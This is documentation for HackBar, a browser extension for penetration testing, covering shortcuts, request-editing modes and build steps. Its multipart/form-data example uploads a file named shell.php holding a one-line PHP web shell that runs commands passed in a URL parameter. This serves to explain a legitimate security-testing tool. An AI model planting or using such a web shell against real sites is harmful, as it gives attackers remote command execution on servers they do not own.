Home

Awesome

HackBar

A browser extension for Penetration Testing.

Available on Chrome Web Store and Firefox Add-ons.

Requested Permissions

Features

Usage

How to open it?

  1. Open Developer tools (Press F12 or Ctrl + Shift + I)
  2. Switch to HackBar tab
  3. Enjoy it

Shortcuts

DescriptionShortcut
LoadAlt + A
SplitAlt + S
ExecuteAlt + X
ModeAlt + M

Request Editing

Basic mode

multipart/form-data

After changing enctype field to multipart/form-data, you can put your payload into Body field such as the following:

------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"

user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--

We will consider the first line as boundary, and reconstruct a form element to send your request.

Therefore, sent boundary will not be the same as you typed.

application/json

After changing enctype field to application/json, you can put your payload into Body field such as the following:

{
  "username": "admin",
  "password": "admin"
}

If your payload doesn't contain =:

In order to post JSON data, we will insert a dummy field or object to your JSON such as the following:

{ "username": "admin", "password": "admin", "4dxnzjzd5mi": "=" }

For more details, please visit "Posting JSON with an HTML Form".

Raw mode

This mode is implemented via fetch API. It will try the best to send a request as same as you typed.

However, there are some limitations:

Request

Response

Third-party Libraries

See package.json for details.

Build Steps

Assume that we are in a clean ubuntu:22.04 container

# Update apt
apt update
# Install basic tools
apt install -y curl python3 make gcc g++ patch jq
# Install nvm
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.0/install.sh | bash
# Restart shell
exec "$SHELL"
# Install Node.js 22
nvm install 22
# Install yarn
npm install -g yarn
# Go to the source code directory
cd hackbar
# Install hackbar dependencies
yarn install
# Build hackbar for Firefox and Chrome
yarn build:firefox
yarn build:chrome

Contributor